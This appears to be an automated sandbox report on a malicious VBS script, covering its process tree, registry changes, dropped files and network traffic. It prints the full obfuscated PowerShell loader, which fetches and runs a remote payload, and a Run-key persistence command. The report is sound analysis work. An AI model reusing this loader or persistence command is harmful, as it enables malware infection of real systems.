| File name: | a0c98c5d094f3a962b2d06214fea99847dde9f9cf243ba595d9a111ef46e4cda.vbs |
| Full analysis: | https://app.any.run/tasks/2b12b14d-bd8a-462b-8629-d8000772015b |
| Verdict: | Malicious activity |
| Analysis date: | January 24, 2024, 17:43:21 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | 291189DBCC8FD160DEA92E43040F31BC |
| SHA1: | 12E93151C18EAE201394ED3CBE3E4EB559851492 |
| SHA256: | A0C98C5D094F3A962B2D06214FEA99847DDE9F9CF243BA595D9A111EF46E4CDA |
| SSDEEP: | 384:uP//UdKF3pwiWK+VPfS5/CpBi2/c+9yl/xUTVYykWB3:WPpwit+tf4Ii2tgyT6WB |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 916 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Theanth Pepto Busser Uddiffere Fuldt #>;Function Efterspndi ([String]$Skubbe){$Samorritat=8;$Kinesisk=Mnjema1864($Skubbe);For($Samo=7; $Samo -lt $Kinesisk; $Samo+=$Samorritat){$Mnjema186=$Mnjema186+$Skubbe.Substring($Samo, 1)};$Mnjema186;}function Legemerne ($neuro){. ($Mnjema18601) ($neuro);}function Mnjema1864 ([String]$Konv){$Hootchesj1=$Konv.Length-1;$Hootchesj1;}$Mnjema18602=Efterspndi 'SuveraeTDynastirSnyderta Karaokn BrdfrusinpensifsorospoeLeucorrrStundrhrTestpiliAfhudennAppendagValgkam ';$Formandss=Efterspndi 'OpstillhTillidstMandagetOutdodgpTawsings Blomme:Sermoni/ Recept/PredicaibrydninhRytterkoDelineam GemineeBysvalesSpecialc DinareoCheckrymKirkegafWhinneloStraaler HumiditTorpede.Smdenavc FunktiotamtammmMutuali/PlatyspaBehovsrbJereeds/ PathfiKInstrueoUnderjomErysimumHdersgaiConfron.RelictdaHypokoncSiddembaErkende ';$Mnjema18601=Efterspndi 'PalantiiIndustreKleptomxDisinte ';$Mnjema18600=Efterspndi 'Gastroe$ EncefagDisappolTunnelboGvendembBelastnaThrapphl Annale: NegeriHDaglejeoPurprisoFortrintMedbrincHovedsahSpegeple AftryksYirringjSigmaet8tvangsm Heizing=Botiexi UnsorroSSubsiditGcellefaModbyderRevoksetViolern-ReprimaBSpeedwaiEnalyrotNonrescs SlagstTsicambrrElfhoodaScintilnIndopersKovacsafIndianeeamaryllrAfvegne Soakeds-CapiturS opfordoSaccharu TortulrRensnincAttouchePrecliv Nidkres$MineralFHumrforoBiplaner Jordovmglamoura TrkrudnFiktivadIdylismsTrappess Decapi Bulder-BladselDGrafikte MalfeasPreposstsmutteriNubilounfunktioaSomnambtMeloidaiTilstedoUncompenKiwitrt Rescal$FibropuH mdelokoprocacco ForbnntPostkasc owletohTriticaeUhjlpelsCashoopjBerolig2Fartber ';Legemerne (Efterspndi ' Juanna$Chirpieg SubradlSimilisoThistedbfugningastiltonlScholae:GennemkHReaddicoChronocomorlykotAvisartcGoodenih Afvrgee BalkjosQuipnonjEpilimn2 Vrdils=Stjerne$Nonenvie UnderknBortfoevPresbyt:UnhappiaForudbepMudroompSuppevid Anlgsta SnekastDivisioahvidvin ') ;Legemerne (Efterspndi ' IatrotIBegattamHydrogepsystemkoAbjunctrEkstrautParamou-ForstadM LeisuroSkrmarbdRingorduAftvinglOblatkae Traneb OpladerBprotochi PelototFarvevasLedelseTKlovnenrHabitrea BrinkenMultiplsRadernaf RomaneeDisciplrSkattev ') ;$Hootchesj2=$Hootchesj2+'\gastroto.Kir' ;Legemerne (Efterspndi 'Nonexub$skrivefgCourtiel HyperfoAccomplbUdeerhvakonstanl Dggela:SkovsavHSpytkrloisflageoPreadjut GenoptcKrafteshLngerneeDetaljes kommunjNipsgen7Cheviot=Skydepr(TjavsedTepispade Indkrvsdistribt Hypost-SchizogP EmanataGeromortKarambohlektrer Illustr$StjrthaHMinimusoMultisioBogatyrtAbrazitcRegionsh SwelteeBayheadsStorstajPresola2Drivkra)Thoraco ') ;while (-not $Hootchesj7) {Legemerne (Efterspndi ' BundfrICocainefOsborne Nonsucc(Switche$SecretiH slagteoAwardfoo AtolritSkatteacArbejdshAtwixtmeLuminess FellmojDeclive8Dknings.mrtelvrJ MellemoApologebStilmblSInsureetBlaahataJordrentRoddingeAnkylog Indiffe-KonsuleeNordmanqstudies Manefar$MidnatsMCafetern NaperyjOverdraeHolmensmDegnensaForstte1 Selekt8Massage6museums0Afmilit2Bonnycl)Selvddt Pilotpr{ HellerSBrnepartPercursavestindrorganistRoentge- StjforSdemipeslTummerueElevedeeNgleperpfinansi unwitt1sparsen}SmedejeeEmbodiel nonaccsCowberreAflejre{KujonscSKriminotbaracabaFilesanrMaaletetDreamie-PurslanSMannerslTaarnureTelefoneRekursbpBrovagt Tallini1Vouchsa; JusterLTenoriteCowlhylgBlaffene Bifagsm UddeleeFinansorPentahynAfrodiseTransum Cabinet$UncrystM AtelosnTelefonjWhirlwieBotswanm ChelifaAfflade1Seaworn8Styrtbo6Kuldebl0Disjunk0asketre}Beskude ');Legemerne (Efterspndi 'Cuspide$MonauragHollieslLeverino uncompb StepbaaEndeliglBiologs: MassefH RepropofremfreoHaverintAnkelsocNongenuhAdelphie ParaensSchoolbjVenefic7Svikler=Pressur( ZamarrTGeobotae MicrogsDilettatKeglers-TekstfePCornettaderivertSilkelrhMrenesp Hypsome$VelvetbHInappreoBrancheoRockerftOminssqcMedvindhGodskrieMurkransLandvsejStinass2Cathete)Kronolo ') ;}Legemerne (Efterspndi 'Ruffene$Millifag AbersvlQuaichsoStaatrob Glaspua FeedsmlDampbag:TearlikBSaligpreSiluroioBygakserGvinkeldUnderbyrCapsianeMarstalsGudewifbManifesa Ansine Admittb= Outloo StamaktGAffaldsePerseret Opsaml-IniquitCHipsintoMorrionnFremholtFuglecoeNondiasn judicat vacill Socialm$HejsteuHHdersgaoMethoxyoKalciumtRessoucc LommeshFulkdroe elektrs OveridjSparean2Husvild ');Legemerne (Efterspndi 'Sovepil$AversiogPoditeulParapodoFolklorbIllegalaReductol rodfas: NonrepRHurtleseStabilihUnderskeVoldeliaForpligrWetbirdiLfteparn Unsumm Aglethe= Nuisan Investm[HuleboeSbeskyttyUndertasgistssuturedinoeExtempomOverfru.UnabaseCArbejdsoDoorfranOverflav KapunsePacoletrRoyalistSluthoo]Outstee:Slukker:HenfaldFUnlunatrSlowmouoSledgermOmlbsouBPostresaTaknemlsSupermae Queers6 Kontro4PhilosoSTabaccot PomacerWeakishiEnchequngumiarbgMamonci(Batteri$ TagginBUndvrereautocoroTorporsrDogmetdd RedirirDataspeeIgnaciusStasesbbmeticulacowpunc) Transi ');Legemerne (Efterspndi 'Enkleme$Ealdermg Krokusl LgeerkoneurocybFiragotaClimberlKildeka:PlasticM IridocnTuschefjStenogre BlasermReglossa Deodor1 corses8Roquela6Submers2 Schedi Apoteke=Spisefr deflate[SpisesiSAmblyacy AnlgsgsScoliidtEllfisheMentolsmGrossne.SlumresTCambogieHermitaxByfestet Preben. UndselEKaukasin dentincAgendasogaflendd SnagediUnsceninDeanthrgSiegelv]Hemangi:Relevat:FreezesAHartlytSAfretteCLydefriISpectacIPludsel. TehandG CommeneNondupltTarzanuS ProsectAfskiberteksturiAdsorbenForhaangButomac(Semiann$RanthumRIrenscaeDriverkhProlangeUnintenaSmringsrSulfapriHandelsnFemoror)Hexamer ');Legemerne (Efterspndi 'Arrecta$UnquakegSprydsol uknnedo ArivaibSoegeraamorcotelProhast:NathimlMUnlocalnOutingsjaccerseeSocialdmOplandsa Parasi1Smedesv8Datasik6Lignese3Tendypr=Billeda$ EpitriMRethavenKhaikiojAnarthreNeurotomHusmndeaSnogesk1Wikiuds8Centrer6 afskrk2Betonbl.Begivensausteniu BibliobInsalubsKldernetEftermirPhilipui ugelannElefstrg Daghje(Assiduo3Anantab3 Viskes5Militar4indvand8Florida8Rogersc, ovario2Ekspone4fresiae7Overinf1Optagni4Augusta) Afskum ');Legemerne $Mnjema1863;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1500 | "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rekind" /t REG_EXPAND_SZ /d "%Skysovs% -w 1 $Fanspanted=(Get-ItemProperty -Path 'HKCU:\Stools\').Fratrdel;%Skysovs% ($Fanspanted)" | C:\Windows\SysWOW64\cmd.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1896 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\a0c98c5d094f3a962b2d06214fea99847dde9f9cf243ba595d9a111ef46e4cda.vbs" | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 2148 | "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Theanth Pepto Busser Uddiffere Fuldt #>;Function Efterspndi ([String]$Skubbe){$Samorritat=8;$Kinesisk=Mnjema1864($Skubbe);For($Samo=7; $Samo -lt $Kinesisk; $Samo+=$Samorritat){$Mnjema186=$Mnjema186+$Skubbe.Substring($Samo, 1)};$Mnjema186;}function Legemerne ($neuro){. ($Mnjema18601) ($neuro);}function Mnjema1864 ([String]$Konv){$Hootchesj1=$Konv.Length-1;$Hootchesj1;}$Mnjema18602=Efterspndi 'SuveraeTDynastirSnyderta Karaokn BrdfrusinpensifsorospoeLeucorrrStundrhrTestpiliAfhudennAppendagValgkam ';$Formandss=Efterspndi 'OpstillhTillidstMandagetOutdodgpTawsings Blomme:Sermoni/ Recept/PredicaibrydninhRytterkoDelineam GemineeBysvalesSpecialc DinareoCheckrymKirkegafWhinneloStraaler HumiditTorpede.Smdenavc FunktiotamtammmMutuali/PlatyspaBehovsrbJereeds/ PathfiKInstrueoUnderjomErysimumHdersgaiConfron.RelictdaHypokoncSiddembaErkende ';$Mnjema18601=Efterspndi 'PalantiiIndustreKleptomxDisinte ';$Mnjema18600=Efterspndi 'Gastroe$ EncefagDisappolTunnelboGvendembBelastnaThrapphl Annale: NegeriHDaglejeoPurprisoFortrintMedbrincHovedsahSpegeple AftryksYirringjSigmaet8tvangsm Heizing=Botiexi UnsorroSSubsiditGcellefaModbyderRevoksetViolern-ReprimaBSpeedwaiEnalyrotNonrescs SlagstTsicambrrElfhoodaScintilnIndopersKovacsafIndianeeamaryllrAfvegne Soakeds-CapiturS opfordoSaccharu TortulrRensnincAttouchePrecliv Nidkres$MineralFHumrforoBiplaner Jordovmglamoura TrkrudnFiktivadIdylismsTrappess Decapi Bulder-BladselDGrafikte MalfeasPreposstsmutteriNubilounfunktioaSomnambtMeloidaiTilstedoUncompenKiwitrt Rescal$FibropuH mdelokoprocacco ForbnntPostkasc owletohTriticaeUhjlpelsCashoopjBerolig2Fartber ';Legemerne (Efterspndi ' Juanna$Chirpieg SubradlSimilisoThistedbfugningastiltonlScholae:GennemkHReaddicoChronocomorlykotAvisartcGoodenih Afvrgee BalkjosQuipnonjEpilimn2 Vrdils=Stjerne$Nonenvie UnderknBortfoevPresbyt:UnhappiaForudbepMudroompSuppevid Anlgsta SnekastDivisioahvidvin ') ;Legemerne (Efterspndi ' IatrotIBegattamHydrogepsystemkoAbjunctrEkstrautParamou-ForstadM LeisuroSkrmarbdRingorduAftvinglOblatkae Traneb OpladerBprotochi PelototFarvevasLedelseTKlovnenrHabitrea BrinkenMultiplsRadernaf RomaneeDisciplrSkattev ') ;$Hootchesj2=$Hootchesj2+'\gastroto.Kir' ;Legemerne (Efterspndi 'Nonexub$skrivefgCourtiel HyperfoAccomplbUdeerhvakonstanl Dggela:SkovsavHSpytkrloisflageoPreadjut GenoptcKrafteshLngerneeDetaljes kommunjNipsgen7Cheviot=Skydepr(TjavsedTepispade Indkrvsdistribt Hypost-SchizogP EmanataGeromortKarambohlektrer Illustr$StjrthaHMinimusoMultisioBogatyrtAbrazitcRegionsh SwelteeBayheadsStorstajPresola2Drivkra)Thoraco ') ;while (-not $Hootchesj7) {Legemerne (Efterspndi ' BundfrICocainefOsborne Nonsucc(Switche$SecretiH slagteoAwardfoo AtolritSkatteacArbejdshAtwixtmeLuminess FellmojDeclive8Dknings.mrtelvrJ MellemoApologebStilmblSInsureetBlaahataJordrentRoddingeAnkylog Indiffe-KonsuleeNordmanqstudies Manefar$MidnatsMCafetern NaperyjOverdraeHolmensmDegnensaForstte1 Selekt8Massage6museums0Afmilit2Bonnycl)Selvddt Pilotpr{ HellerSBrnepartPercursavestindrorganistRoentge- StjforSdemipeslTummerueElevedeeNgleperpfinansi unwitt1sparsen}SmedejeeEmbodiel nonaccsCowberreAflejre{KujonscSKriminotbaracabaFilesanrMaaletetDreamie-PurslanSMannerslTaarnureTelefoneRekursbpBrovagt Tallini1Vouchsa; JusterLTenoriteCowlhylgBlaffene Bifagsm UddeleeFinansorPentahynAfrodiseTransum Cabinet$UncrystM AtelosnTelefonjWhirlwieBotswanm ChelifaAfflade1Seaworn8Styrtbo6Kuldebl0Disjunk0asketre}Beskude ');Legemerne (Efterspndi 'Cuspide$MonauragHollieslLeverino uncompb StepbaaEndeliglBiologs: MassefH RepropofremfreoHaverintAnkelsocNongenuhAdelphie ParaensSchoolbjVenefic7Svikler=Pressur( ZamarrTGeobotae MicrogsDilettatKeglers-TekstfePCornettaderivertSilkelrhMrenesp Hypsome$VelvetbHInappreoBrancheoRockerftOminssqcMedvindhGodskrieMurkransLandvsejStinass2Cathete)Kronolo ') ;}Legemerne (Efterspndi 'Ruffene$Millifag AbersvlQuaichsoStaatrob Glaspua FeedsmlDampbag:TearlikBSaligpreSiluroioBygakserGvinkeldUnderbyrCapsianeMarstalsGudewifbManifesa Ansine Admittb= Outloo StamaktGAffaldsePerseret Opsaml-IniquitCHipsintoMorrionnFremholtFuglecoeNondiasn judicat vacill Socialm$HejsteuHHdersgaoMethoxyoKalciumtRessoucc LommeshFulkdroe elektrs OveridjSparean2Husvild ');Legemerne (Efterspndi 'Sovepil$AversiogPoditeulParapodoFolklorbIllegalaReductol rodfas: NonrepRHurtleseStabilihUnderskeVoldeliaForpligrWetbirdiLfteparn Unsumm Aglethe= Nuisan Investm[HuleboeSbeskyttyUndertasgistssuturedinoeExtempomOverfru.UnabaseCArbejdsoDoorfranOverflav KapunsePacoletrRoyalistSluthoo]Outstee:Slukker:HenfaldFUnlunatrSlowmouoSledgermOmlbsouBPostresaTaknemlsSupermae Queers6 Kontro4PhilosoSTabaccot PomacerWeakishiEnchequngumiarbgMamonci(Batteri$ TagginBUndvrereautocoroTorporsrDogmetdd RedirirDataspeeIgnaciusStasesbbmeticulacowpunc) Transi ');Legemerne (Efterspndi 'Enkleme$Ealdermg Krokusl LgeerkoneurocybFiragotaClimberlKildeka:PlasticM IridocnTuschefjStenogre BlasermReglossa Deodor1 corses8Roquela6Submers2 Schedi Apoteke=Spisefr deflate[SpisesiSAmblyacy AnlgsgsScoliidtEllfisheMentolsmGrossne.SlumresTCambogieHermitaxByfestet Preben. UndselEKaukasin dentincAgendasogaflendd SnagediUnsceninDeanthrgSiegelv]Hemangi:Relevat:FreezesAHartlytSAfretteCLydefriISpectacIPludsel. TehandG CommeneNondupltTarzanuS ProsectAfskiberteksturiAdsorbenForhaangButomac(Semiann$RanthumRIrenscaeDriverkhProlangeUnintenaSmringsrSulfapriHandelsnFemoror)Hexamer ');Legemerne (Efterspndi 'Arrecta$UnquakegSprydsol uknnedo ArivaibSoegeraamorcotelProhast:NathimlMUnlocalnOutingsjaccerseeSocialdmOplandsa Parasi1Smedesv8Datasik6Lignese3Tendypr=Billeda$ EpitriMRethavenKhaikiojAnarthreNeurotomHusmndeaSnogesk1Wikiuds8Centrer6 afskrk2Betonbl.Begivensausteniu BibliobInsalubsKldernetEftermirPhilipui ugelannElefstrg Daghje(Assiduo3Anantab3 Viskes5Militar4indvand8Florida8Rogersc, ovario2Ekspone4fresiae7Overinf1Optagni4Augusta) Afskum ');Legemerne $Mnjema1863;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 2172 | "C:\Program Files (x86)\windows mail\wab.exe" | C:\Program Files (x86)\windows mail\wab.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 3221225477 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2316 | REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rekind" /t REG_EXPAND_SZ /d "%Skysovs% -w 1 $Fanspanted=(Get-ItemProperty -Path 'HKCU:\Stools\').Fratrdel;%Skysovs% ($Fanspanted)" | C:\Windows\SysWOW64\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (1896) wscript.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (1896) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (916) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (916) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (916) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (916) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (916) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1896 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:AC05D27423A85ADC1622C714F2CB6184 | SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D | |||
| 1896 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:32C2CA4D59F44092CCB01ED63D1E7DEC | SHA256:DBC05929182A2282001AEF3647377ACE67314E8A711883ED1707AD5F054B9175 | |||
| 1896 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Cab49C.tmp | compressed | |
MD5:AC05D27423A85ADC1622C714F2CB6184 | SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D | |||
| 1896 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Tar49D.tmp | binary | |
MD5:9C0C641C06238516F27941AA1166D427 | SHA256:4276AF3669A141A59388BC56A87F6614D9A9BDDDF560636C264219A7EB11256F | |||
| 916 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:1BB55BFB13A8D65B61D2B980DCF5DC32 | SHA256:EE972334C23CFF7D47D2D488B430DDC752E24874A77C3F3B314F76C911BC3C2D | |||
| 2148 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8637E3C48E1AAF3566CD5C561474E39F | SHA256:BDBF3AF4795B1EEEA955FEAD12EE7F1FABBDDC4410816B668F71C73CE0F2CF3C | |||
| 916 | powershell.exe | C:\Users\admin\AppData\Local\Temp\nwzpv4uq.smx.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
| 2148 | powershell.exe | C:\Users\admin\AppData\Local\Temp\yfjxwoxi.zw3.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
| 2148 | powershell.exe | C:\Users\admin\AppData\Local\Temp\d35ofcdx.t2z.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
| 916 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pwoevpxi.ewz.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1896 | wscript.exe | GET | 200 | 23.48.23.7:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11e138be541e0fe0 | DE | compressed | 65.2 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1896 | wscript.exe | 23.48.23.7:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown |
1220 | svchost.exe | 239.255.255.250:3702 | — | — | — | whitelisted |
352 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1220 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
864 | svchost.exe | 162.0.235.86:443 | ihomescomfort.com | NAMECHEAP-NET | US | unknown |
2172 | wab.exe | 142.250.184.238:443 | drive.google.com | GOOGLE | US | whitelisted |
2172 | wab.exe | 142.250.186.161:443 | drive.usercontent.google.com | GOOGLE | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
ctldl.windowsupdate.com |
| whitelisted |
ihomescomfort.com |
| unknown |
drive.google.com |
| shared |
drive.usercontent.google.com |
| unknown |